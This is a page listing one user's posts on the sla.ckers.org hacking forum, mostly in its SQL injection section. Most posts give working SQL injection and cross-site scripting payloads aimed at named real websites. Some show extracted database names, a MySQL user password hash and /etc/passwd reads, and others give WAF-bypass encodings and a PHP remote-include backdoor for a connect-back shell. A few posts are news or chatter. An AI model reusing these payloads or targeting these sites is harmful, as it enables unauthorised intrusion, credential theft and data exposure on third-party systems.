Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How robots and spiders are causing issues, how to stop them. We can also talk about Completely Automated Public Turing Test To Tell Computers And Humans Apart - their use, their compliance issues, porn proxies, PWNtcha and other ways to defeat them. 

Pages: 12345Next
Current Page: 1 of 5
Results 1 - 30 of 131
1 year ago
VMw4r3
http://goo.gl/Xpc3D
Forum: SQL and Code Injection
1 year ago
VMw4r3
xss http://continue.austincc.edu/catalog/courses.php?term=212UCE&name=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3EPHP&topic=PHP
Forum: SQL and Code Injection
1 year ago
VMw4r3
It works with sqlmap v8. http://continue.austincc.edu/index/view.php?id=62211 [16:32:31] retrieved: nformation_schema [16:38:05] retrieved: ce [16:38:51] retrieved: mysql [16:40:20] retrieved: phpmyadmin [16:42:43] retrieved: wordpress available databases [5]: [*] ce [*] information_schema [*] mysql [*] phpmyadmin [*] wordpress [17:15:47] retrieved: an-sys-maint'@'l
Forum: SQL and Code Injection
1 year ago
VMw4r3
%oaUnIon%oa20all%20%oaSelect%oa gets past the waf but still cant find injection.
Forum: SQL and Code Injection
1 year ago
VMw4r3
You can use union with havij. Analyzing http://www.southernct.edu/search/directories/profile/?id=48952 Positive pattern generated Host IP: 149.152.64.11 Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8l PHP/5.2.9 Powered-by: PHP/5.2.9 Keyword Found I guess injection type is Integer?! Can't find db server type! But maybe there be some chances! [-o< Selected Column Count i
Forum: SQL and Code Injection
1 year ago
VMw4r3
Try use GROUP BY instead of ORDER.
Forum: SQL and Code Injection
2 years ago
VMw4r3
It's mysql V3. ?id=28357 and substring(@@version,1,1)=3 <-- true
Forum: SQL and Code Injection
2 years ago
VMw4r3
124 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user,password,host),14,15 from mysql.user root:595bbf94168ab731:localhost 595bbf94168ab731:ji9olk ?id=124 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,load_file(0x2F6574632F706173737764),14,15
Forum: SQL and Code Injection
2 years ago
VMw4r3
http://www.androians.com/mirach/news/news.php?idx=580 and 4=5 union all select 1,2,concat_ws(0x3a,user(),database(),@@version),4-- - eventuser@eventweb2:iskydb:5.1.45-community Visible in the page source code. A quick way to check which column is visible is hex encode xss and check for alert when no columns are visable on page. http://www.androians.com/mirach/news/news.php?idx=580 an
Forum: SQL and Code Injection
2 years ago
VMw4r3
Theres no filter! php?id=19+AND+1=2+UNION+SELECT+1,concat_ws(0x3a,user(),database(),@@version),3,user(),5,6,7--
Forum: SQL and Code Injection
2 years ago
VMw4r3
LulzSec Leader Was Snitch Who Helped Snag Fellow Hackers QuoteA top LulzSec leader turned informant after he was secretly arrested last year and then provided information to law enforcement which resulted in the arrest on two continents Tuesday of other top members of the hacking group, including one of the alleged leaders of the Stratfor hack, according to a news report. Hector Xavier Monse
Forum: OMG Ponies
2 years ago
VMw4r3
http://www.newsarama.com/php/multimedia/album_view.php?gid=-1358/**//*!union*//**/all/**//*!select*//**/version(),2-- 5.0.45-log http://www.newsarama.com/php/multimedia/album_view.php?gid=-1358/**//*!union*//**/all/**//*!select*//**/table_name,2/**/From/**/Information_Schema%20.%20Tables%20limit%2032,1--
Forum: SQL and Code Injection
2 years ago
VMw4r3
johndoe Wrote: ------------------------------------------------------- > if you recall the filter it for me post i > commented in i found the phpinfo file using linux > terminal, id like to know how can i upload it > here, also i found sql injections in > memberlist.php and groupcp.php > lol johndoe you keep hijacking other peoples threads. Try use the "New Topi
Forum: SQL and Code Injection
2 years ago
VMw4r3
johndoe Wrote: ------------------------------------------------------- > www.globovision.com i just found via burp proxy, > not firefox, that by adding single quote in some > pages it gives sql errors.. > > http://www.globovision.com/channel.php? is an > example.. > > where do i go afterwards from here? I think you need to start at the begining and learn the b
Forum: SQL and Code Injection
2 years ago
VMw4r3
GOOGLE havij
Forum: SQL and Code Injection
2 years ago
VMw4r3
http://pastebin.com/3jWkk0bX
Forum: SQL and Code Injection
2 years ago
VMw4r3
Theres a similar issue with the fb app on the iPhone. Occasionally my daughter would use my iphone to login to her fb,but when she logs out and I logged back in I was getting my fb mail and chat but the home page (status updates) was still logged in as her. I havent tried it in a few months since the old app layout.
Forum: Privacy
2 years ago
VMw4r3
Whitespaces %20 %09 %0a %0b %0c %0d %a0 /**/ ‘or+(1)sounds/**/like“1“–%a0- ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
Forum: SQL and Code Injection
3 years ago
VMw4r3
http://www.eegmusic.com/artist/album.php/view/211/54761 and 9=4 union all select 1,concat_ws(0x3a,user,password,host),3,4,5,6 from mysql.user limit 0,1-- - http://www.eegmusic.com/artist/album.php/view/211/547 and 9=4 union all select 1,load_file(0x2F6574632F706173737764),3,4,5,6-- - *edit http://www.eegmusic.com/artist/album.php/view/211/547 and 9=4 union all select 1,unhex(hex(concat_ws
Forum: SQL and Code Injection
3 years ago
VMw4r3
U.S. Gov Seeks Longer Prison Sentences for Criminal Hackers: QuoteCriminal and black hat hackers beware - If the U.S. government finds you, it is not going to be lenient. The stakes are rising in the world of cybersecurity and the Obama administration is not taking it lightly. The White House has proposed to congress an increase in maximum jail time for criminal hackers whose acts are "
Forum: News and Links
3 years ago
VMw4r3
Xss exists too. http://sla.ckers.org/forum/read.php?3,44,36319#msg-36319
Forum: Robots/Spiders/CAPTCHAs, oh my
3 years ago
VMw4r3
Use blind sqli.
Forum: SQL and Code Injection
3 years ago
VMw4r3
It's MSsql. http://www.betalebanon.org/n_news.asp?news_id=convert(int,db_name()) and 1=1
Forum: SQL and Code Injection
3 years ago
VMw4r3
http://justplaingeek.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script> http://justplaingeek.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script> http://blogs.ischool.utexas.edu/wp-content/plugins/si-contact-form/c
Forum: Full Disclosure
3 years ago
VMw4r3
http://www.toshiba.com/ind/searchresult.jsp?scontains=<script>alert(document.cookie);</script> &x=0&y=0&item=product This one only works with "<H1>XSS</H1>" tags in it ? http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=AskIris&searchString=<SCRIPT>alert(document.cookie)</SCRIPT><H1>XSS</H1>&x=0
Forum: Full Disclosure
3 years ago
VMw4r3
For backconnect I'd normally use: ZoRBaCK Connect Back Shell: Or uplaod <?php include("$_GET"); ?> And connect using fimap.
Forum: Obfuscation
3 years ago
VMw4r3
http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/byday.php?summitDate=1" and 3=5 union all select 1,concat_ws(0x3a,user(),database(),@@version,@@datadir),3,4,5,6,7,8,9,10,11,12,13,14,15,16 AND "x"="x http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/byday.php?summitDate=1" and 3=5 union all select 1,unhex(hex(concat_ws(0x3a,user_login,user
Forum: SQL and Code Injection
3 years ago
VMw4r3
Theres an XXS on the site. http://vpn.rminfraestrutura.com.br//intranet/painel/lib/classes/dompdf/www/examples.php/"</script><script>alert(document.cookie) </script> http://vpn.rminfraestrutura.com.br/intranet/painel/lib/classes/fckeditor/editor/filemanager/browser/default/figuras.php/1<ScRiPt>alert(document.cookie)</ScRiPt>
Forum: SQL and Code Injection
3 years ago
VMw4r3
Download the login script and see what method is being used to encrypt/encode the DBConnection file.
Forum: SQL and Code Injection
3 years ago
VMw4r3
Why do you want to bypass the filter when theres no injection?
Forum: SQL and Code Injection
Pages: 12345Next
Current Page: 1 of 5